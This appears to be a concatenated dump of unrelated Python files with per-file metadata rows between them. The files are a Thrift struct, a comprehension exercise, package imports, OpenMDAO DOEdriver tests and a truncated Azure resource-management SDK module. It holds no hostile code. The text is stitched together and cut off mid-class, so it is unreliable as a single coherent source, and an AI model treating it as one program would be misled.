Attributes:
- success
"""
thrift_spec = (
(0, TType.I32, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I32:
self.success = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('status_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.I32, 0)
oprot.writeI32(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 30.169268 | 188 | 0.66985 | 2,891 | 25,131 | 5.556555 | 0.050156 | 0.031126 | 0.034861 | 0.061006 | 0.849353 | 0.811815 | 0.806586 | 0.788284 | 0.785359 | 0.781935 | 0 | 0.002978 | 0.211611 | 25,131 | 832 | 189 | 30.205529 | 0.807803 | 0.018622 | 0 | 0.8 | 1 | 0 | 0.027393 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.145038 | false | 0.007634 | 0.00916 | 0.042748 | 0.299237 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
cf510082878dc64232d52d88ea6eccca34b40819 | 362 | py | Python | exercises/08-python-beyond-basics-exercise-files/values.py | deskach/pybasics | 75372aa8b795fb4608e7cf2f5ccb276da980e8d0 | [
"MIT"
] | null | null | null | exercises/08-python-beyond-basics-exercise-files/values.py | deskach/pybasics | 75372aa8b795fb4608e7cf2f5ccb276da980e8d0 | [
"MIT"
] | null | null | null | exercises/08-python-beyond-basics-exercise-files/values.py | deskach/pybasics | 75372aa8b795fb4608e7cf2f5ccb276da980e8d0 | [
"MIT"
] | null | null | null | values = [x / (x - y) for x in range(100) if x > 50 for y in range(100) if x - y != 0]
values = [x / (x - y)
for x in range(100)
if x > 50
for y in range(100)
if x - y != 0]
values = []
for x in range(100):
if x > 50:
for y in range(100):
if x - y != 0:
values.append(x / (x - y)) | 25.857143 | 86 | 0.422652 | 65 | 362 | 2.353846 | 0.169231 | 0.078431 | 0.392157 | 0.470588 | 0.941176 | 0.941176 | 0.941176 | 0.941176 | 0.941176 | 0.941176 | 0 | 0.131707 | 0.433702 | 362 | 14 | 87 | 25.857143 | 0.614634 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
cf68157e6c8292a1f58fad1465d40bae0ab1fcb0 | 237 | py | Python | phasIR/__init__.py | MariaPoliti/phasIR | 281f7d8d99a0b2fd928f895bca2c9eb9b58991a6 | [
"MIT"
] | 3 | 2021-02-21T07:18:28.000Z | 2022-01-03T18:18:11.000Z | phasIR/__init__.py | MariaPoliti/phasIR | 281f7d8d99a0b2fd928f895bca2c9eb9b58991a6 | [
"MIT"
] | null | null | null | phasIR/__init__.py | MariaPoliti/phasIR | 281f7d8d99a0b2fd928f895bca2c9eb9b58991a6 | [
"MIT"
] | 1 | 2021-05-07T18:32:38.000Z | 2021-05-07T18:32:38.000Z | from .thermal_analysis import * # noqa: F401, F403
from .image_analysis import * # noqa: F401, F403
from .irtemp import * # noqa: F401, F403
from .data_management import * # noqa: F401, F403
name = 'phasIR'
| 33.857143 | 54 | 0.628692 | 29 | 237 | 5.034483 | 0.448276 | 0.273973 | 0.383562 | 0.493151 | 0.561644 | 0.410959 | 0 | 0 | 0 | 0 | 0 | 0.139535 | 0.274262 | 237 | 6 | 55 | 39.5 | 0.709302 | 0.2827 | 0 | 0 | 0 | 0 | 0.036364 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.8 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d897bda292b8c30722c2f346738552e3f30f4115 | 219 | py | Python | sumo_rl/__init__.py | Eden1114/sumo-rl | c0c2a1fd6f61ad30b76129bfe936c6b9c7439593 | [
"MIT"
] | null | null | null | sumo_rl/__init__.py | Eden1114/sumo-rl | c0c2a1fd6f61ad30b76129bfe936c6b9c7439593 | [
"MIT"
] | null | null | null | sumo_rl/__init__.py | Eden1114/sumo-rl | c0c2a1fd6f61ad30b76129bfe936c6b9c7439593 | [
"MIT"
] | null | null | null | from .environment.env import SumoEnvironment
from .environment.env import env, parallel_env
from .environment.resco_envs import grid4x4, arterial4x4, ingolstadt1, ingolstadt7, ingolstadt21, cologne1, cologne3, cologne8
| 54.75 | 126 | 0.844749 | 25 | 219 | 7.32 | 0.64 | 0.245902 | 0.196721 | 0.262295 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055276 | 0.091324 | 219 | 3 | 127 | 73 | 0.864322 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
d8ce2de1dda7fb129a4fccc343e875e8ebafd2c4 | 17,822 | py | Python | openmdao.lib/src/openmdao/lib/drivers/test/test_doedriver.py | swryan/OpenMDAO-Framework | f50d60e1a8cadac7fe03d26ffad5fb660b2a15ec | [
"Apache-2.0"
] | null | null | null | openmdao.lib/src/openmdao/lib/drivers/test/test_doedriver.py | swryan/OpenMDAO-Framework | f50d60e1a8cadac7fe03d26ffad5fb660b2a15ec | [
"Apache-2.0"
] | null | null | null | openmdao.lib/src/openmdao/lib/drivers/test/test_doedriver.py | swryan/OpenMDAO-Framework | f50d60e1a8cadac7fe03d26ffad5fb660b2a15ec | [
"Apache-2.0"
] | null | null | null | """
Test DOEdriver.
"""
import logging
import nose
import os.path
import pkg_resources
import re
import sys
import unittest
from openmdao.lib.datatypes.api import Event
from openmdao.main.api import Assembly, Component, set_as_top
from openmdao.lib.datatypes.api import Float, Bool
from openmdao.lib.casehandlers.api import SequenceCaseFilter
from openmdao.lib.drivers.doedriver import DOEdriver, NeighborhoodDOEdriver
from openmdao.lib.casehandlers.api import ListCaseRecorder, DumpCaseRecorder
from openmdao.lib.doegenerators.api import OptLatinHypercube, FullFactorial, \
CSVFile
# Capture original working directory so we can restore in tearDown().
ORIG_DIR = os.getcwd()
# pylint: disable-msg=E1101
def replace_uuid(msg):
""" Replace UUID in `msg` with ``UUID``. """
pattern = '[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'
return re.sub(pattern, 'UUID', msg)
def rosen_suzuki(x0, x1, x2, x3):
""" Evaluate polynomial from CONMIN manual. """
return x0**2 - 5.*x0 + x1**2 - 5.*x1 + \
2.*x2**2 - 21.*x2 + x3**2 + 7.*x3 + 50
class DrivenComponent(Component):
""" Just something to be driven and compute results. """
x0 = Float(1., iotype='in')
y0 = Float(1., iotype='in') # used just to get ParameterGroup
x1 = Float(1., iotype='in')
x2 = Float(1., iotype='in')
x3 = Float(1., iotype='in')
err_event = Event()
stop_exec = Bool(False, iotype='in')
rosen_suzuki = Float(0., iotype='out')
def __init__(self):
super(DrivenComponent, self).__init__()
self._raise_err = False
def _err_event_fired(self):
self._raise_err = True
def execute(self):
""" Compute results from input vector. """
self.rosen_suzuki = rosen_suzuki(self.x0, self.x1, self.x2, self.x3)
if self._raise_err:
self.raise_exception('Forced error', RuntimeError)
if self.stop_exec:
self.parent.driver.stop() # Only valid if sequential!
class MyModel(Assembly):
""" Use DOEdriver with DrivenComponent. """
def configure(self):
self.add('driver', DOEdriver())
self.add('driven', DrivenComponent())
self.driver.workflow.add('driven')
self.driver.DOEgenerator = OptLatinHypercube(num_samples=10)
self.driver.case_outputs = ['driven.rosen_suzuki']
self.driver.add_parameter(('driven.x0', 'driven.y0'),
low=-10., high=10., scaler=20., adder=10.)
for name in ['x1', 'x2', 'x3']:
self.driver.add_parameter("driven.%s" % name,
low=-10., high=10., scaler=20., adder=10.)
class TestCaseDOE(unittest.TestCase):
""" Test DOEdriver. """
# Need to be in this directory or there are issues with egg loading.
directory = pkg_resources.resource_filename('openmdao.lib.drivers', 'test')
def setUp(self):
os.chdir(self.directory)
self.model = set_as_top(MyModel())
def tearDown(self):
self.model.pre_delete()
self.model = None
if os.path.exists('driver.csv'):
os.remove('driver.csv')
# Verify we didn't mess-up working directory.
end_dir = os.getcwd()
os.chdir(ORIG_DIR)
if os.path.realpath(end_dir).lower() != os.path.realpath(self.directory).lower():
self.fail('Ended in %s, expected %s' % (end_dir, self.directory))
def test_sequential(self):
logging.debug('')
logging.debug('test_sequential')
self.run_cases(sequential=True)
def test_sequential_errors(self):
logging.debug('')
logging.debug('test_sequential_errors')
self.model.driver._call_execute = True
self.run_cases(sequential=True, forced_errors=True, retry=True)
def test_sequential_errors_abort(self):
self.run_cases(sequential=True, forced_errors=True)
def test_no_parameter(self):
logging.debug('')
logging.debug('test_no_parameter')
try:
self.model.driver.add_parameter('foobar.blah')
except AttributeError as err:
self.assertEqual(str(err), "driver: Can't add parameter"
" 'foobar.blah' because it doesn't exist.")
def test_event_removal(self):
self.model.driver.add_event('driven.err_event')
lst = self.model.driver.get_events()
self.assertEqual(lst, ['driven.err_event'])
self.model.driver.remove_event('driven.err_event')
lst = self.model.driver.get_events()
self.assertEqual(lst, [])
def test_param_removal(self):
lst = self.model.driver.list_param_targets()
self.assertEqual(lst, ['driven.x0', 'driven.y0',
'driven.x1', 'driven.x2', 'driven.x3'])
self.model.driver.remove_parameter('driven.x1')
lst = self.model.driver.list_param_targets()
self.assertEqual(lst, ['driven.x0', 'driven.y0',
'driven.x2', 'driven.x3'])
def test_no_event(self):
logging.debug('')
logging.debug('test_no_event')
try:
self.model.driver.add_event('foobar.blah')
except AttributeError as err:
self.assertEqual(str(err), "driver: Can't add event"
" 'foobar.blah' because it doesn't exist")
else:
self.fail("expected AttributeError")
def test_nooutput(self):
logging.debug('')
logging.debug('test_nooutput')
results = ListCaseRecorder()
self.model.driver.recorders = [results]
self.model.driver.error_policy = 'RETRY'
self.model.driver.case_outputs.append('driven.sum_z')
self.model.run()
self.assertEqual(len(results),
self.model.driver.DOEgenerator.num_samples)
for case in results.cases:
expected = "driver: Exception getting case outputs: " \
"driven \(UUID.[0-9]+-1\): " \
"'DrivenComponent' object has no attribute 'sum_z'"
msg = replace_uuid(case.msg)
self.assertTrue(re.match(expected, msg))
def test_noiterator(self):
logging.debug('')
logging.debug('test_noiterator')
# Check resoponse to no iterator set.
self.model.driver.recorders = [ListCaseRecorder()]
self.model.driver.DOEgenerator = None
try:
self.model.run()
except Exception as exc:
msg = "driver: required plugin 'DOEgenerator' is not present"
self.assertEqual(str(exc), msg)
else:
self.fail('Exception expected')
def test_norecorder(self):
logging.debug('')
logging.debug('test_norecorder')
self.model.driver.recorders = []
self.model.run()
def test_output_error(self):
class Dummy(Component):
x = Float(0, iotype="in")
y = Float(0, iotype="out")
z = Float(0, iotype="out")
def execute(self):
self.y = 10 + self.x
class Analysis(Assembly):
def configure(self):
self.add('d', Dummy())
self.add('driver', DOEdriver())
self.driver.DOEgenerator = FullFactorial(2)
self.driver.recorders = [DumpCaseRecorder()]
self.driver.add_parameter('d.x', low=0, high=10)
self.driver.case_outputs = ['d.y', 'd.bad', 'd.z']
a = Analysis()
try:
a.run()
except Exception as err:
err = replace_uuid(str(err))
self.assertTrue(err.startswith('driver: Run aborted: Traceback '))
self.assertTrue(err.endswith("d (UUID.1-1): 'Dummy' object has no attribute 'bad'"))
else:
self.fail("Exception expected")
def run_cases(self, sequential, forced_errors=False, retry=True):
# Evaluate cases, either sequentially or across multiple servers.
self.model.driver.sequential = sequential
results = ListCaseRecorder()
self.model.driver.recorders = [results]
self.model.driver.error_policy = 'RETRY' if retry else 'ABORT'
if forced_errors:
self.model.driver.add_event('driven.err_event')
if retry:
self.model.run()
self.assertEqual(len(results), 10)
self.verify_results(forced_errors)
else:
assert_raises(self, 'self.model.run()', globals(), locals(),
RuntimeError, "driver: Run aborted:"
" RuntimeError('driven: Forced error',)")
def test_scaling(self):
self.model.driver.DOEgenerator = ff = FullFactorial(num_levels=3)
ff.num_parameters = 4
for case in self.model.driver._get_cases():
print case
def verify_results(self, forced_errors=False):
# Verify recorded results match expectations.
for case in self.model.driver.recorders[0].cases:
if forced_errors:
expected = 'driven \(UUID.[0-9]+-1\): Forced error'
msg = replace_uuid(case.msg)
self.assertTrue(re.match(expected, msg))
else:
self.assertEqual(case.msg, None)
self.assertEqual(case['driven.rosen_suzuki'],
rosen_suzuki(*[case['driven.x%s' % i] for i in range(4)]))
def test_rerun(self):
logging.debug('')
logging.debug('test_rerun')
self.run_cases(sequential=True)
orig_cases = self.model.driver.recorders[0].cases
self.model.driver.DOEgenerator = CSVFile(self.model.driver.doe_filename)
self.model.driver.record_doe = False
rerun_seq = (1, 3, 5, 7, 9)
self.model.driver.case_filter = SequenceCaseFilter(rerun_seq)
rerun = ListCaseRecorder()
self.model.driver.recorders[0] = rerun
self.model.run()
self.assertEqual(len(orig_cases), 10)
self.assertEqual(len(rerun.cases), len(rerun_seq))
for i, case in enumerate(rerun.cases):
self.assertEqual(case, orig_cases[rerun_seq[i]])
class MyModel2(Assembly):
""" Use DOEdriver with DrivenComponent. """
def configure(self):
self.add('driver', NeighborhoodDOEdriver())
self.add('driven', DrivenComponent())
self.driver.workflow.add('driven')
self.driver.DOEgenerator = OptLatinHypercube(num_samples=10)
self.driver.case_outputs = ['driven.rosen_suzuki']
self.driver.add_parameter(('driven.x0', 'driven.y0'),
low=-10., high=10., scaler=20., adder=10.)
for name in ['x1', 'x2', 'x3']:
self.driver.add_parameter("driven.%s" % name,
low=-10., high=10., scaler=20., adder=10.)
class TestCaseNeighborhoodDOE(unittest.TestCase):
""" Test NeighborhoodDOEdriver. """
# Need to be in this directory or there are issues with egg loading.
directory = pkg_resources.resource_filename('openmdao.lib.drivers', 'test')
def setUp(self):
os.chdir(self.directory)
self.model = set_as_top(MyModel2())
def tearDown(self):
self.model.pre_delete()
self.model = None
# Verify we didn't mess-up working directory.
end_dir = os.getcwd()
os.chdir(ORIG_DIR)
if os.path.realpath(end_dir).lower() != os.path.realpath(self.directory).lower():
self.fail('Ended in %s, expected %s' % (end_dir, self.directory))
def test_sequential(self):
logging.debug('')
logging.debug('test_sequential')
self.run_cases(sequential=True)
def test_sequential_errors(self):
logging.debug('')
logging.debug('test_sequential_errors')
self.model.driver._call_execute = True
self.run_cases(sequential=True, forced_errors=True, retry=True)
def test_sequential_errors_abort(self):
self.run_cases(sequential=True, forced_errors=True)
def test_no_parameter(self):
logging.debug('')
logging.debug('test_no_parameter')
try:
self.model.driver.add_parameter('foobar.blah')
except AttributeError as err:
self.assertEqual(str(err), "driver: Can't add parameter"
" 'foobar.blah' because it doesn't exist.")
def test_event_removal(self):
self.model.driver.add_event('driven.err_event')
lst = self.model.driver.get_events()
self.assertEqual(lst, ['driven.err_event'])
self.model.driver.remove_event('driven.err_event')
lst = self.model.driver.get_events()
self.assertEqual(lst, [])
def test_param_removal(self):
lst = self.model.driver.list_param_targets()
self.assertEqual(lst, ['driven.x0', 'driven.y0',
'driven.x1', 'driven.x2', 'driven.x3'])
self.model.driver.remove_parameter('driven.x1')
lst = self.model.driver.list_param_targets()
self.assertEqual(lst, ['driven.x0', 'driven.y0',
'driven.x2', 'driven.x3'])
def test_no_event(self):
logging.debug('')
logging.debug('test_no_event')
try:
self.model.driver.add_event('foobar.blah')
except AttributeError as err:
self.assertEqual(str(err), "driver: Can't add event"
" 'foobar.blah' because it doesn't exist")
else:
self.fail("expected AttributeError")
def test_nooutput(self):
logging.debug('')
logging.debug('test_nooutput')
results = ListCaseRecorder()
self.model.driver.recorders = [results]
self.model.driver.error_policy = 'RETRY'
self.model.driver.case_outputs.append('driven.sum_z')
self.model.run()
self.assertEqual(len(results), 1 + self.model.driver.DOEgenerator.num_samples)
for case in results.cases:
expected = "driver: Exception getting case outputs: " \
"driven \(UUID.[0-9]+-1\): " \
"'DrivenComponent' object has no attribute 'sum_z'"
msg = replace_uuid(case.msg)
self.assertTrue(re.match(expected, msg))
def test_noiterator(self):
logging.debug('')
logging.debug('test_noiterator')
# Check resoponse to no iterator set.
self.model.driver.recorders = [ListCaseRecorder()]
self.model.driver.DOEgenerator = None
try:
self.model.run()
except Exception as exc:
msg = "driver: required plugin 'DOEgenerator' is not present"
self.assertEqual(str(exc), msg)
else:
self.fail('Exception expected')
def test_norecorder(self):
logging.debug('')
logging.debug('test_norecorder')
self.model.driver.recorders = []
self.model.run()
def test_output_error(self):
class Dummy(Component):
x = Float(0, iotype="in")
y = Float(0, iotype="out")
z = Float(0, iotype="out")
def execute(self):
self.y = 10 + self.x
class Analysis(Assembly):
def configure(self):
self.add('d', Dummy())
self.add('driver', NeighborhoodDOEdriver())
self.driver.DOEgenerator = FullFactorial(2)
self.driver.recorders = [DumpCaseRecorder()]
self.driver.add_parameter('d.x', low=0, high=10)
self.driver.case_outputs = ['d.y', 'd.bad', 'd.z']
a = Analysis()
try:
a.run()
except Exception as err:
err = replace_uuid(str(err))
self.assertTrue(err.startswith('driver: Run aborted: Traceback '))
self.assertTrue(err.endswith("d (UUID.1-1): 'Dummy' object has no attribute 'bad'"))
else:
self.fail("Exception expected")
def run_cases(self, sequential, forced_errors=False, retry=True):
# Evaluate cases, either sequentially or across multiple servers.
self.model.driver.sequential = sequential
results = ListCaseRecorder()
self.model.driver.recorders = [results]
self.model.driver.error_policy = 'RETRY' if retry else 'ABORT'
if forced_errors:
self.model.driver.add_event('driven.err_event')
if retry:
self.model.run()
self.assertEqual(len(results), 11)
self.verify_results(forced_errors)
else:
assert_raises(self, 'self.model.run()', globals(), locals(),
RuntimeError, "driver: Run aborted:"
" RuntimeError('driven: Forced error',)")
def test_scaling(self):
self.model.driver.DOEgenerator = ff = FullFactorial(num_levels=3)
ff.num_parameters = 4
for case in self.model.driver._get_cases():
print case
def verify_results(self, forced_errors=False):
# Verify recorded results match expectations.
for case in self.model.driver.recorders[0].cases:
if forced_errors:
expected = 'driven \(UUID.[0-9]+-1\): Forced error'
msg = replace_uuid(case.msg)
self.assertTrue(re.match(expected, msg))
else:
self.assertEqual(case.msg, None)
self.assertEqual(case['driven.rosen_suzuki'],
rosen_suzuki(*[case['driven.x%s' % i] for i in range(4)]))
if __name__ == "__main__":
sys.argv.append('--cover-package=openmdao.lib.drivers')
sys.argv.append('--cover-erase')
nose.runmodule()
| 36.371429 | 96 | 0.594434 | 2,081 | 17,822 | 4.976934 | 0.129265 | 0.061697 | 0.078208 | 0.033311 | 0.834605 | 0.820604 | 0.798397 | 0.798397 | 0.798397 | 0.798397 | 0 | 0.014239 | 0.278869 | 17,822 | 489 | 97 | 36.445808 | 0.791628 | 0.037201 | 0 | 0.809651 | 0 | 0.002681 | 0.134382 | 0.010841 | 0 | 0 | 0 | 0 | 0.093834 | 0 | null | null | 0 | 0.037534 | null | null | 0.005362 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2b62bc963881775db8e9560e3866aada206f8e2c | 312,107 | py | Python | env/Lib/site-packages/azure/mgmt/resource/resourcemanagement.py | Ammar12/simplebanking | 6080d638b2e98bfcf96d782703e1dce25aebfcbc | [
"MIT"
] | null | null | null | env/Lib/site-packages/azure/mgmt/resource/resourcemanagement.py | Ammar12/simplebanking | 6080d638b2e98bfcf96d782703e1dce25aebfcbc | [
"MIT"
] | null | null | null | env/Lib/site-packages/azure/mgmt/resource/resourcemanagement.py | Ammar12/simplebanking | 6080d638b2e98bfcf96d782703e1dce25aebfcbc | [
"MIT"
] | null | null | null | #-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
# Warning: This code was generated by a tool.
#
# Changes to this file may cause incorrect behavior and will be lost if the
# code is regenerated.
from datetime import datetime
import json
import re
from requests import Session, Request
import time
try:
from urllib import quote, unquote
except:
from urllib.parse import quote, unquote
from azure.common import AzureHttpError
from azure.mgmt.common import AzureOperationResponse, OperationStatusResponse, OperationStatus, Service
from azure.mgmt.common.arm import ResourceBase, ResourceBaseExtended
class LongRunningOperationResponse(AzureOperationResponse):
"""
A standard service response for long running operations.
"""
def __init__(self, **kwargs):
super(LongRunningOperationResponse, self).__init__(**kwargs)
self._operation_status_link = kwargs.get('operation_status_link')
self._retry_after = kwargs.get('retry_after')
self._status = kwargs.get('status')
self._error = kwargs.get('error')
@property
def error(self):
return self._error
@error.setter
def error(self, value):
self._error = value
@property
def operation_status_link(self):
return self._operation_status_link
@operation_status_link.setter
def operation_status_link(self, value):
self._operation_status_link = value
@property
def retry_after(self):
return self._retry_after
@retry_after.setter
def retry_after(self, value):
self._retry_after = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
class ProviderUnregistionResult(AzureOperationResponse):
"""
Resource provider registration information.
"""
def __init__(self, **kwargs):
super(ProviderUnregistionResult, self).__init__(**kwargs)
self._provider = kwargs.get('provider')
@property
def provider(self):
"""
Gets or sets the resource provider.
"""
return self._provider
@provider.setter
def provider(self, value):
self._provider = value
class ProviderRegistionResult(AzureOperationResponse):
"""
Resource provider registration information.
"""
def __init__(self, **kwargs):
super(ProviderRegistionResult, self).__init__(**kwargs)
self._provider = kwargs.get('provider')
@property
def provider(self):
"""
Gets or sets the resource provider.
"""
return self._provider
@provider.setter
def provider(self, value):
self._provider = value
class ProviderListResult(AzureOperationResponse):
"""
List of resource providers.
"""
def __init__(self, **kwargs):
super(ProviderListResult, self).__init__(**kwargs)
self._providers = kwargs.get('providers')
self._next_link = kwargs.get('next_link')
@property
def next_link(self):
"""
Gets or sets the URL to get the next set of results.
"""
return self._next_link
@next_link.setter
def next_link(self, value):
self._next_link = value
@property
def providers(self):
"""
Gets or sets the list of resource providers.
"""
return self._providers
@providers.setter
def providers(self, value):
self._providers = value
class ProviderListParameters(object):
"""
Deployment list operation parameters.
"""
def __init__(self, **kwargs):
self._top = kwargs.get('top')
@property
def top(self):
"""
Get or sets the number of records to return. Optional.
"""
return self._top
@top.setter
def top(self, value):
self._top = value
class ProviderGetResult(AzureOperationResponse):
"""
Resource provider information.
"""
def __init__(self, **kwargs):
super(ProviderGetResult, self).__init__(**kwargs)
self._provider = kwargs.get('provider')
@property
def provider(self):
"""
Gets or sets the resource provider.
"""
return self._provider
@provider.setter
def provider(self, value):
self._provider = value
class ResourcesMoveInfo(object):
"""
Parameters of move resources.
"""
def __init__(self, **kwargs):
self._resources = kwargs.get('resources')
self._target_resource_group = kwargs.get('target_resource_group')
@property
def resources(self):
"""
Gets or sets the ids of the resources.
"""
return self._resources
@resources.setter
def resources(self, value):
self._resources = value
@property
def target_resource_group(self):
"""
The target resource group.
"""
return self._target_resource_group
@target_resource_group.setter
def target_resource_group(self, value):
self._target_resource_group = value
class ResourceExistsResult(AzureOperationResponse):
"""
Resource group information.
"""
def __init__(self, **kwargs):
super(ResourceExistsResult, self).__init__(**kwargs)
self._exists = kwargs.get('exists')
@property
def exists(self):
"""
Gets or sets the value indicating whether the resource group exists.
"""
return self._exists
@exists.setter
def exists(self, value):
self._exists = value
class ResourceListResult(AzureOperationResponse):
"""
List of resource groups.
"""
def __init__(self, **kwargs):
super(ResourceListResult, self).__init__(**kwargs)
self._resources = kwargs.get('resources')
self._next_link = kwargs.get('next_link')
@property
def next_link(self):
"""
Gets or sets the URL to get the next set of results.
"""
return self._next_link
@next_link.setter
def next_link(self, value):
self._next_link = value
@property
def resources(self):
"""
Gets or sets the list of resource groups.
"""
return self._resources
@resources.setter
def resources(self, value):
self._resources = value
class ResourceListParameters(object):
"""
Resource group information.
"""
def __init__(self, **kwargs):
self._resource_group_name = kwargs.get('resource_group_name')
self._resource_type = kwargs.get('resource_type')
self._tag_name = kwargs.get('tag_name')
self._tag_value = kwargs.get('tag_value')
self._top = kwargs.get('top')
@property
def resource_group_name(self):
"""
Gets or sets resource resource group to filter by. Optional.
"""
return self._resource_group_name
@resource_group_name.setter
def resource_group_name(self, value):
self._resource_group_name = value
@property
def resource_type(self):
"""
Filter the results for a particular resource type. Optional.
"""
return self._resource_type
@resource_type.setter
def resource_type(self, value):
self._resource_type = value
@property
def tag_name(self):
"""
Filter the results based on a particular tag name. Optional.
"""
return self._tag_name
@tag_name.setter
def tag_name(self, value):
self._tag_name = value
@property
def tag_value(self):
"""
Filter the results for a tag name along with a particular tag value.
Optional.
"""
return self._tag_value
@tag_value.setter
def tag_value(self, value):
self._tag_value = value
@property
def top(self):
"""
Number of records to return. Optional.
"""
return self._top
@top.setter
def top(self, value):
self._top = value
class ResourceCreateOrUpdateResult(AzureOperationResponse):
"""
Resource information.
"""
def __init__(self, **kwargs):
super(ResourceCreateOrUpdateResult, self).__init__(**kwargs)
self._resource = kwargs.get('resource')
@property
def resource(self):
"""
Gets or sets the resource.
"""
return self._resource
@resource.setter
def resource(self, value):
self._resource = value
class GenericResource(ResourceBase):
"""
Resource information.
"""
def __init__(self, **kwargs):
super(GenericResource, self).__init__(**kwargs)
self._properties = kwargs.get('properties')
self._provisioning_state = kwargs.get('provisioning_state')
self._plan = kwargs.get('plan')
@property
def plan(self):
"""
Gets or sets the plan of the resource.
"""
return self._plan
@plan.setter
def plan(self, value):
self._plan = value
@property
def properties(self):
"""
Gets or sets the resource properties.
"""
return self._properties
@properties.setter
def properties(self, value):
self._properties = value
@property
def provisioning_state(self):
"""
Gets or sets resource provisioning state.
"""
return self._provisioning_state
@provisioning_state.setter
def provisioning_state(self, value):
self._provisioning_state = value
class ResourceGetResult(AzureOperationResponse):
"""
Resource information.
"""
def __init__(self, **kwargs):
super(ResourceGetResult, self).__init__(**kwargs)
self._resource = kwargs.get('resource')
@property
def resource(self):
"""
Gets or sets the resource.
"""
return self._resource
@resource.setter
def resource(self, value):
self._resource = value
class TagCreateValueResult(AzureOperationResponse):
"""
Tag information.
"""
def __init__(self, **kwargs):
super(TagCreateValueResult, self).__init__(**kwargs)
self._value = kwargs.get('value')
@property
def value(self):
"""
Gets or sets the tag value.
"""
return self._value
@value.setter
def value(self, value):
self._value = value
class TagCreateResult(AzureOperationResponse):
"""
Tag information.
"""
def __init__(self, **kwargs):
super(TagCreateResult, self).__init__(**kwargs)
self._tag = kwargs.get('tag')
@property
def tag(self):
"""
Gets or sets the tag.
"""
return self._tag
@tag.setter
def tag(self, value):
self._tag = value
class TagsListResult(AzureOperationResponse):
"""
List of subscription tags.
"""
def __init__(self, **kwargs):
super(TagsListResult, self).__init__(**kwargs)
self._tags = kwargs.get('tags')
self._next_link = kwargs.get('next_link')
@property
def next_link(self):
"""
Gets or sets the URL to get the next set of results.
"""
return self._next_link
@next_link.setter
def next_link(self, value):
self._next_link = value
@property
def tags(self):
"""
Gets or sets the list of tags.
"""
return self._tags
@tags.setter
def tags(self, value):
self._tags = value
class DeploymentOperationsGetResult(AzureOperationResponse):
"""
Deployment operation.
"""
def __init__(self, **kwargs):
super(DeploymentOperationsGetResult, self).__init__(**kwargs)
self._operation = kwargs.get('operation')
@property
def operation(self):
"""
Gets or sets the deployment operation.
"""
return self._operation
@operation.setter
def operation(self, value):
self._operation = value
class DeploymentOperationsListResult(AzureOperationResponse):
"""
List of deployment operations.
"""
def __init__(self, **kwargs):
